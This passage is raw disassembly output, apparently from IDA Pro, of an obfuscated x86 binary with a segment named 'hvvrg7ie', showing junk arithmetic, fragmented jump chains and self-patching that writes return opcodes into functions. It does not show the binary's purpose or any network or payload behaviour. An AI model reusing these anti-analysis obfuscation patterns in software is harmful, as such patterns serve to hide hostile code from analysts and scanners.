		jmp	loc_43B8EB
; END OF FUNCTION CHUNK	FOR sub_4414F6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_458095

loc_4461EE:				; CODE XREF: sub_458095-13E81j
		test	edx, ebp
		jmp	loc_43CB0A
; END OF FUNCTION CHUNK	FOR sub_458095
; ---------------------------------------------------------------------------

loc_4461F5:				; CODE XREF: hvvrg7ie:00451614j
		sbb	esi, edx
; START	OF FUNCTION CHUNK FOR sub_44543A

loc_4461F7:				; CODE XREF: sub_44543A:loc_44178Ej
		mov	edi, ebp

loc_4461F9:				; CODE XREF: sub_44A230+4B88j
		and	ebx, 73A6EAE8h
		xor	ebx, 0F9E4BC3Dh
		jmp	loc_44A081
; END OF FUNCTION CHUNK	FOR sub_44543A
; ---------------------------------------------------------------------------

loc_44620A:				; CODE XREF: hvvrg7ie:loc_43B48Fj
		and	edx, 832FE0Ah
		rol	edx, 17h
		cmp	edx, 0A8B46BF7h
		jmp	loc_447D5E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4554E8

loc_44621E:				; CODE XREF: sub_4554E8:loc_443ED8j
		adc	ebx, 26903A9h
		sub	ebp, esi
		jmp	loc_456D1B
; END OF FUNCTION CHUNK	FOR sub_4554E8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43AB99

loc_44622B:				; CODE XREF: sub_43AB99:loc_441BF0j
		call	sub_44E410

loc_446230:				; CODE XREF: sub_4416C3+Ej
		jnz	loc_43FD47
		jmp	loc_443FA7
; END OF FUNCTION CHUNK	FOR sub_43AB99
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44616F

loc_44623B:				; CODE XREF: sub_44616F:loc_44DFD8j
		push	offset loc_44FC2A
		jmp	loc_448D87
; END OF FUNCTION CHUNK	FOR sub_44616F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449CC8

loc_446245:				; CODE XREF: sub_449CC8+88B8j
		jp	loc_4583EC
; END OF FUNCTION CHUNK	FOR sub_449CC8
; START	OF FUNCTION CHUNK FOR sub_4408AE

loc_44624B:				; CODE XREF: sub_4408AE-47EDj
		jmp	loc_449EA4
; END OF FUNCTION CHUNK	FOR sub_4408AE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44CB64

loc_446250:				; CODE XREF: sub_44CB64-EF73j
					; hvvrg7ie:loc_44B3CAj
		sub	al, 99h
		push	2C155A74h
		pop	edx

loc_446258:				; CODE XREF: hvvrg7ie:004524E3j
		rol	edx, 2
		jnb	loc_449746

loc_446261:				; CODE XREF: sub_450246-4C4Dj
		jmp	loc_4501F8
; END OF FUNCTION CHUNK	FOR sub_44CB64
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E9D6

loc_446266:				; CODE XREF: sub_43E9D6+BD2Aj
		jmp	loc_44464B
; END OF FUNCTION CHUNK	FOR sub_43E9D6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4426E2

loc_44626B:				; CODE XREF: sub_4426E2+21D1j
		jmp	loc_446679
; END OF FUNCTION CHUNK	FOR sub_4426E2
; ---------------------------------------------------------------------------
		rol	edx, 0Dh
		pushf
		jmp	loc_449742
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C290

loc_446279:				; CODE XREF: sub_43C290+Ej
		jnz	loc_4590A5
		jmp	loc_442B51
; END OF FUNCTION CHUNK	FOR sub_43C290

; =============== S U B	R O U T	I N E =======================================



sub_446284	proc near		; DATA XREF: hvvrg7ie:0043D12Bo

arg_8		= dword	ptr  0Ch

; FUNCTION CHUNK AT 00439626 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045651E SIZE 00000007 BYTES

		and	ecx, 0DB60C587h
		pop	edx
		pop	ebx
		pop	ecx
		xchg	ebp, [esp-0Ch+arg_8]
		mov	eax, ebp
		jmp	loc_45651E
sub_446284	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_446297	proc near		; CODE XREF: sub_44BF66-8CBDp
					; hvvrg7ie:0044FBECj

; FUNCTION CHUNK AT 00439699 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00439D9E SIZE 0000001D BYTES
; FUNCTION CHUNK AT 0044E427 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 004550ED SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0045644F SIZE 00000005 BYTES

		xchg	esi, [esp+0]
		pop	esi
		push	edx
		push	8DF646EFh
		pop	edx
		and	edx, 766BCF84h
		add	edx, 0FBE208D6h
		call	sub_45426F

loc_4462B3:				; CODE XREF: sub_43D16B+19B4Ej
		jmp	loc_439D9E
sub_446297	endp

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_339. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440643

loc_4462B9:				; CODE XREF: sub_440643+1344Ej
		jmp	nullsub_197
; END OF FUNCTION CHUNK	FOR sub_440643
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45196D

loc_4462BE:				; CODE XREF: sub_45196D-F14Aj
		jmp	loc_4425CF
; END OF FUNCTION CHUNK	FOR sub_45196D
; ---------------------------------------------------------------------------

loc_4462C3:				; CODE XREF: hvvrg7ie:0043B7F0j
		mov	ecx, eax
		pop	eax
		sub	ecx, 0ABDFC181h
		and	ecx, 74D992A4h
		add	ecx, 0FFB1CE90h
		push	offset sub_4415A4
		jmp	loc_44B227
; ---------------------------------------------------------------------------

loc_4462E2:				; DATA XREF: hvvrg7ie:loc_4526B4o
		push	1B2C53D8h
		pop	ecx
		sub	ecx, 0BFFBA067h
		cmp	ecx, 58AB2D4Bh
		jmp	loc_456B3D

; =============== S U B	R O U T	I N E =======================================



sub_4462F9	proc near		; CODE XREF: hvvrg7ie:004493DFp
					; hvvrg7ie:00455AD6j

; FUNCTION CHUNK AT 0043CA0D SIZE 00000019 BYTES
; FUNCTION CHUNK AT 0043E4E8 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0043F00C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00445EA4 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0044618C SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00446761 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00447FE0 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045310D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00459902 SIZE 0000000B BYTES

		xchg	edx, [esp+0]
		pop	edx
		imul	byte ptr [edx]
		cmp	al, 0A4h
		jz	loc_44520A
		jmp	loc_45310D
sub_4462F9	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_44630C:				; CODE XREF: hvvrg7ie:loc_43A175j
		mov	byte ptr [eax],	0C3h
		jmp	loc_458138

; =============== S U B	R O U T	I N E =======================================



sub_446314	proc near		; CODE XREF: sub_41A690+27Bp
					; sub_41A690+2AFp ...
		call	sub_44631F
		jmp	ds:off_41D100
sub_446314	endp


; =============== S U B	R O U T	I N E =======================================



sub_44631F	proc near		; CODE XREF: hvvrg7ie:loc_43B1EAj
					; sub_43FCF7+3j ...

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0043FCFF SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00454784 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00458B0C SIZE 00000020 BYTES

		jns	loc_43FCFF
		pop	edx
		mov	eax, [esp+0]
		jmp	sub_43953B
sub_44631F	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447D56

loc_44632E:				; CODE XREF: sub_447D56:loc_439434j
		push	ecx
		call	sub_452F78

loc_446334:				; CODE XREF: sub_43D285+15E16j
		jmp	loc_43DF07
; END OF FUNCTION CHUNK	FOR sub_447D56
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C1F3

loc_446339:				; CODE XREF: sub_44C1F3+17j
		jmp	loc_43FAA3
; END OF FUNCTION CHUNK	FOR sub_44C1F3
; ---------------------------------------------------------------------------

loc_44633E:				; CODE XREF: hvvrg7ie:0044968Fj
		jmp	sub_4489AE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4527A1

loc_446343:				; CODE XREF: sub_4527A1:loc_44DE4Fj
		mov	eax, ds:dword_43CDC4
		or	eax, eax
		jnz	loc_44327D
		jmp	loc_43C943
; END OF FUNCTION CHUNK	FOR sub_4527A1

; =============== S U B	R O U T	I N E =======================================



sub_446356	proc near		; DATA XREF: sub_4465A6:loc_4547B9o

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043A0AB SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043F12B SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00448E8D SIZE 00000005 BYTES

		add	esi, 2661CC40h
		xchg	esi, [esp+0]
		jmp	loc_43A0AB
sub_446356	endp

; ---------------------------------------------------------------------------

loc_446364:				; CODE XREF: hvvrg7ie:0043E0EAj
		cmp	edi, 67894E1Ch
		jmp	loc_4526C9
; ---------------------------------------------------------------------------

loc_44636F:				; CODE XREF: hvvrg7ie:004495E8j
		mov	ebx, edx
		xchg	ebx, [edx]
		mov	ebp, 0D77FB5BBh

loc_446378:				; CODE XREF: hvvrg7ie:loc_4495D6j
		sub	edi, 0AEE279BCh
		push	offset sub_44A15C
		jmp	locret_458255
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44543A

loc_446388:				; CODE XREF: sub_44543A+9j
		xor	edi, 3FC6ABABh
		cmp	edi, 46D735C5h
		jmp	loc_440B44
; END OF FUNCTION CHUNK	FOR sub_44543A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44CB64

loc_446399:				; CODE XREF: sub_44CB64-7949j
					; sub_44CB64:loc_4501F8j
		movzx	eax, [ebp+var_6]
		mov	edx, [ebp+var_18]
		call	sub_45265D

loc_4463A5:				; CODE XREF: sub_444E8E-FD7j
		jmp	loc_44FA62
; END OF FUNCTION CHUNK	FOR sub_44CB64
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449B65

loc_4463AA:				; CODE XREF: sub_449B65:loc_43962Bj
		mov	[edx-8], eax
; END OF FUNCTION CHUNK	FOR sub_449B65
; START	OF FUNCTION CHUNK FOR sub_44B524

loc_4463AD:				; CODE XREF: sub_43E063+6048j
					; sub_44B524+4j ...
		mov	eax, [ebp-4]
		mov	[ebp-8], eax
		mov	eax, [ebp-8]
		mov	esp, ebp

loc_4463B8:				; CODE XREF: hvvrg7ie:loc_442668j
		jmp	loc_440CE8
; END OF FUNCTION CHUNK	FOR sub_44B524
; ---------------------------------------------------------------------------

loc_4463BD:				; CODE XREF: hvvrg7ie:004427A7j
		jg	loc_4441F1
		push	0A83D32DDh
		pop	edx
		jmp	loc_444AE4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457A97

loc_4463CE:				; CODE XREF: sub_457A97:loc_44F645j
		add	eax, 0C013C81Dh
		xchg	eax, [esp-4+arg_0]
		jmp	loc_45679D
; END OF FUNCTION CHUNK	FOR sub_457A97
; ---------------------------------------------------------------------------

loc_4463DC:				; DATA XREF: sub_43D980:loc_44D282o
		pop	esi
; START	OF FUNCTION CHUNK FOR sub_456A52

loc_4463DD:				; CODE XREF: sub_44E1C9-115E7j
					; sub_456A52:loc_43D1CCj ...
		dec	ds:dword_43D6CC
		mov	eax, [ebp+var_4]
		xchg	esi, [esp+0]
		jmp	loc_448009
; END OF FUNCTION CHUNK	FOR sub_456A52
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D285

loc_4463EE:				; CODE XREF: sub_43D285+675Dj
		jz	loc_45767F

loc_4463F4:				; CODE XREF: hvvrg7ie:00450B3Cj
		jmp	loc_453095
; END OF FUNCTION CHUNK	FOR sub_43D285
; ---------------------------------------------------------------------------
		push	eax

loc_4463FA:				; CODE XREF: hvvrg7ie:loc_4575B8j
		push	93E941E3h
		shr	eax, 4
		jmp	loc_45767D

; =============== S U B	R O U T	I N E =======================================



sub_446407	proc near		; CODE XREF: hvvrg7ie:00451D67j
					; sub_4540B2+Bp

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0044AAB1 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00451589 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00454AA6 SIZE 0000000E BYTES

		xchg	esi, [esp+0]
		pop	esi
		push	0EC76EDB8h
		pop	eax
		or	eax, 0A738DAFEh
		and	eax, 0F7EE567h
		sub	eax, 79A7477Dh
		jmp	loc_451589
sub_446407	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_446428	proc near		; DATA XREF: hvvrg7ie:0044D11Ao

; FUNCTION CHUNK AT 00449712 SIZE 00000005 BYTES

		call	sub_450C5A
		mov	ds:dword_41D0BC, eax
		lea	eax, nullsub_25
		mov	byte ptr [eax],	0C3h
		jmp	loc_449712
sub_446428	endp

; ---------------------------------------------------------------------------
		push	edi
		push	220373Ah
		pop	edi
		jmp	loc_4440F2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445BE8

loc_44644D:				; CODE XREF: sub_445BE8:loc_449953j
		mov	[esi], edx
		jmp	loc_457689
; END OF FUNCTION CHUNK	FOR sub_445BE8
; ---------------------------------------------------------------------------
		mov	edi, edx
		jmp	loc_45080A
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_543. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_44645C:				; CODE XREF: hvvrg7ie:0045AAF6j
		jmp	loc_44E755
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E6A5

loc_446461:				; CODE XREF: sub_44E6A5+2DBFj
					; hvvrg7ie:004520AAj
		jmp	loc_44237B
; END OF FUNCTION CHUNK	FOR sub_44E6A5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B6A5

loc_446466:				; CODE XREF: sub_43B6A5:loc_4525F2j
		xor	esi, edx
		jmp	loc_4514D9
; END OF FUNCTION CHUNK	FOR sub_43B6A5

; =============== S U B	R O U T	I N E =======================================



sub_44646D	proc near		; DATA XREF: sub_44C132-127E9o

; FUNCTION CHUNK AT 0043ACC2 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 0043FF32 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00440E06 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004434D7 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0044DB8A SIZE 0000000A BYTES
; FUNCTION CHUNK AT 004547C3 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00456486 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00456B7B SIZE 00000005 BYTES

		jno	loc_4434D7
		sub	al, 99h
		mov	edx, [ebp-4]
		imul	byte ptr [edx]
		jmp	loc_456486
sub_44646D	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A0B1

loc_44647F:				; CODE XREF: sub_45A0B1-4BEBj
		jz	loc_445D1F
		jmp	loc_43D711
; END OF FUNCTION CHUNK	FOR sub_45A0B1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43CD49

loc_44648A:				; CODE XREF: sub_43CD49+1A498j
		cmp	ecx, 7018A5CDh
		jmp	loc_447891
; END OF FUNCTION CHUNK	FOR sub_43CD49
; ---------------------------------------------------------------------------

loc_446495:				; DATA XREF: sub_4438FA+8174o
		shr	eax, 6
		mov	[ebp-10h], eax
		mov	eax, [ebp+8]
		mov	eax, [eax-10h]
		and	eax, 7
		mov	[ebp-14h], eax
		cmp	dword ptr [ebp-10h], 3
		jmp	loc_4559BF
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_374. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444B29

loc_4464B1:				; CODE XREF: sub_444B29+4F54j
		jmp	nullsub_257
; END OF FUNCTION CHUNK	FOR sub_444B29
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F227

loc_4464B6:				; CODE XREF: sub_43F227-1F6Bj
		jmp	loc_43E014
; END OF FUNCTION CHUNK	FOR sub_43F227
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_142. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448100

loc_4464BC:				; CODE XREF: sub_448100:loc_452362j
		mov	eax, [eax]
		add	eax, [ebp-4]
		add	eax, 18h
		push	esi
		push	5288012Ah
		pop	esi
		xor	esi, 6B9D9C0Fh
		jmp	loc_43DCD6
; END OF FUNCTION CHUNK	FOR sub_448100
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A26A

loc_4464D6:				; CODE XREF: sub_45A26A:loc_447925j
		mov	dword ptr [ecx], 10001h
		lea	eax, loc_456751
		mov	[ecx+0B8h], eax
		pop	ecx
		xor	eax, eax
		jmp	nullsub_402
; END OF FUNCTION CHUNK	FOR sub_45A26A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440E5A

loc_4464F0:				; CODE XREF: sub_440E5A:loc_459693j
		inc	dword ptr [ebp-28h]
		mov	eax, [ebp-28h]
		mov	byte ptr [eax],	6Ch
		inc	dword ptr [ebp-28h]

loc_4464FC:				; CODE XREF: hvvrg7ie:0045A29Bj
		push	offset sub_458374
		jmp	nullsub_365
; END OF FUNCTION CHUNK	FOR sub_440E5A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D964

loc_446506:				; CODE XREF: sub_43D964+3151j
		xor	edi, 0C91B8828h
		test	edi, 20000h
		jmp	loc_454653
; END OF FUNCTION CHUNK	FOR sub_43D964
; ---------------------------------------------------------------------------

loc_446517:				; CODE XREF: hvvrg7ie:0044497Aj
		and	esi, 668F887Bh
		sbb	esi, edx
; START	OF FUNCTION CHUNK FOR sub_450F97

loc_44651F:				; CODE XREF: sub_450F97:loc_44496Cj
		sub	edx, 845A894Bh
		add	edx, 0DFAD1386h
		test	edx, 10000000h
		jmp	loc_439912
; END OF FUNCTION CHUNK	FOR sub_450F97
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4569C6

loc_446536:				; CODE XREF: sub_4569C6+35D6j
		jno	loc_449764
		sbb	ebp, 7C730DC9h
		jmp	loc_43A0FE
; END OF FUNCTION CHUNK	FOR sub_4569C6
; ---------------------------------------------------------------------------

loc_446547:				; CODE XREF: hvvrg7ie:loc_43FEACj
		jnz	loc_4409EF
; START	OF FUNCTION CHUNK FOR sub_458A13

loc_44654D:				; CODE XREF: sub_458A13+6j
		jmp	loc_44C0EE
; END OF FUNCTION CHUNK	FOR sub_458A13
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D671

loc_446552:				; CODE XREF: sub_44D671+Ej
		jmp	loc_44B24D
; END OF FUNCTION CHUNK	FOR sub_44D671
; ---------------------------------------------------------------------------
		test	ebx, 0A5FF7A93h
		jmp	loc_454F1F
; ---------------------------------------------------------------------------
		mov	edx, 6A74FD15h
		call	sub_446A16
		push	ebx
		push	81904C38h
		pop	ebx
		and	ebx, 6A0109EFh
		rol	ebx, 0Ch
		jmp	loc_45A998

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_446581	proc near		; CODE XREF: sub_44612Fj

; FUNCTION CHUNK AT 00448311 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0044B9D1 SIZE 00000005 BYTES

		push	ebp
		mov	ebp, esp
		push	ecx
		cmp	ds:dword_45A8B0, 0
		jnz	loc_44831B
		call	nullsub_22
		call	sub_44DE0A
		mov	edx, 0CF0182F6h
		jmp	loc_44B9D1
sub_446581	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_4465A6	proc near		; DATA XREF: sub_450C5A-12C0Do

var_8		= dword	ptr -8
var_4		= dword	ptr -4

; FUNCTION CHUNK AT 00439A99 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00439EC1 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043A805 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 0043B209 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0043BA1D SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0043BCFB SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0043C181 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0043C533 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043CF11 SIZE 0000001F BYTES
; FUNCTION CHUNK AT 0043D90B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043E344 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 0043F016 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00440266 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0044052A SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004406A9 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00440FA8 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004410C0 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00441291 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 00441CAF SIZE 00000011 BYTES
; FUNCTION CHUNK AT 004430FC SIZE 00000018 BYTES
; FUNCTION CHUNK AT 004442A2 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00444923 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00444DE2 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004450A3 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00445344 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00445DE9 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00445FCF SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004467BE SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00446884 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00446F08 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0044786E SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00448659 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00449C22 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00449F83 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044B944 SIZE 0000001C BYTES
; FUNCTION CHUNK AT 0044C2BB SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044D3CB SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044D575 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0044DD7B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00450154 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00450B74 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00450EC3 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00450FDE SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00451598 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 00451D0E SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00453102 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004547B9 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00454B94 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00454C4F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004559F7 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 00455FDA SIZE 00000016 BYTES
; FUNCTION CHUNK AT 004564EA SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00457B18 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00457FC2 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 004589E5 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00458A30 SIZE 0000001C BYTES
; FUNCTION CHUNK AT 004590C0 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045932A SIZE 0000001D BYTES
; FUNCTION CHUNK AT 004597E1 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045B970 SIZE 00000020 BYTES

		or	edx, edx
		jnz	loc_4589E5
		jmp	loc_4410C0
sub_4465A6	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4512A0

loc_4465B3:				; CODE XREF: sub_4512A0-1085Ej
		or	ebx, 0C943E85Dh
		jmp	loc_43945F
; END OF FUNCTION CHUNK	FOR sub_4512A0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449AD1

loc_4465BE:				; CODE XREF: sub_449AD1-8AFFj
		pop	esi
		rol	esi, 0Ch
		add	esi, 0DF449329h
		xchg	esi, [esp+8+var_8]
		jmp	sub_44059F
; END OF FUNCTION CHUNK	FOR sub_449AD1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44059F

loc_4465D0:				; CODE XREF: sub_44059F-1A43j
		jz	loc_4471A2
		jmp	loc_43AF8B
; END OF FUNCTION CHUNK	FOR sub_44059F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F907

loc_4465DB:				; CODE XREF: sub_43F907:loc_44426Cj
		or	edx, ecx
		pop	ebx
		pop	edx
		pop	eax
		jmp	loc_45A55D
; END OF FUNCTION CHUNK	FOR sub_43F907

; =============== S U B	R O U T	I N E =======================================



sub_4465E5	proc near		; CODE XREF: hvvrg7ie:00446704p
					; hvvrg7ie:004498F4j

; FUNCTION CHUNK AT 0043A2B6 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043F043 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044678E SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00448860 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044A8E2 SIZE 00000007 BYTES

		xchg	esi, [esp+0]
		pop	esi
		mov	[ebp-4], eax
		cmp	dword ptr [ebp-4], 0
		jmp	loc_44678E
sub_4465E5	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		push	edi
		push	84DABEE3h
		xchg	ebp, [esp]
		mov	edi, ebp
		pop	ebp
		jmp	loc_45B8C7
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43953B

loc_446606:				; CODE XREF: sub_43953B:loc_455F84j
		xchg	ecx, [esp+4+var_4]
		mov	edx, ecx
		pop	ecx
		call	sub_4478FE
; END OF FUNCTION CHUNK	FOR sub_43953B
; START	OF FUNCTION CHUNK FOR sub_451697

loc_446611:				; CODE XREF: sub_451697+11j
		jmp	loc_43F73B
; END OF FUNCTION CHUNK	FOR sub_451697
; ---------------------------------------------------------------------------

loc_446616:				; CODE XREF: hvvrg7ie:00450036j
		jmp	locret_44B6AA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D247

loc_44661B:				; CODE XREF: sub_43D247+Cj
		jmp	loc_456A96
; END OF FUNCTION CHUNK	FOR sub_43D247
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_347. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_459B45

loc_446621:				; CODE XREF: sub_459B45-1854Fj
		jmp	sub_44DE0A
; END OF FUNCTION CHUNK	FOR sub_459B45
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440AD9

loc_446626:				; CODE XREF: sub_440AD9+Bj
		jmp	loc_443F9A
; END OF FUNCTION CHUNK	FOR sub_440AD9
; ---------------------------------------------------------------------------

loc_44662B:				; CODE XREF: hvvrg7ie:0045A2A3j
		js	loc_449577
		cmp	edx, edi
		jmp	loc_457209
; ---------------------------------------------------------------------------

loc_446638:				; CODE XREF: hvvrg7ie:0044B778j
		jbe	loc_444D9E

loc_44663E:				; CODE XREF: hvvrg7ie:loc_459F56j
		push	edx
		push	0DFE34166h
		pop	edx
		and	edx, 1D8F5AB8h
		jmp	loc_43BCDE
; ---------------------------------------------------------------------------
		and	ecx, esi
		jmp	sub_454B5C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4580B4

loc_446657:				; CODE XREF: sub_4580B4:loc_448D04j
		jge	loc_43A521

loc_44665D:				; CODE XREF: hvvrg7ie:0044FBE1j
		jmp	loc_45021F
; END OF FUNCTION CHUNK	FOR sub_4580B4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449425

loc_446662:				; CODE XREF: sub_449425+Cj
		jmp	loc_4467FE
; END OF FUNCTION CHUNK	FOR sub_449425
; ---------------------------------------------------------------------------
		sub	ebx, ecx
		jmp	loc_43A51B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45038B

loc_44666E:				; CODE XREF: sub_45038B:loc_455C67j
		jns	loc_43A6CB
		jmp	loc_447396
; END OF FUNCTION CHUNK	FOR sub_45038B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4426E2

loc_446679:				; CODE XREF: sub_4426E2:loc_44626Bj
		pushf
		shr	edi, 16h
		jmp	loc_448556
; END OF FUNCTION CHUNK	FOR sub_4426E2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_455CD4

loc_446682:				; CODE XREF: sub_455CD4:loc_4405FBj
		add	edx, 0DF93F8C6h
		xchg	edx, [esp+0]
		jmp	sub_450C5A
; END OF FUNCTION CHUNK	FOR sub_455CD4
; ---------------------------------------------------------------------------
		mov	ds:off_41D024, eax
		lea	eax, sub_448CCA
		mov	byte ptr [eax],	0C3h
		jmp	sub_448CCA

; =============== S U B	R O U T	I N E =======================================



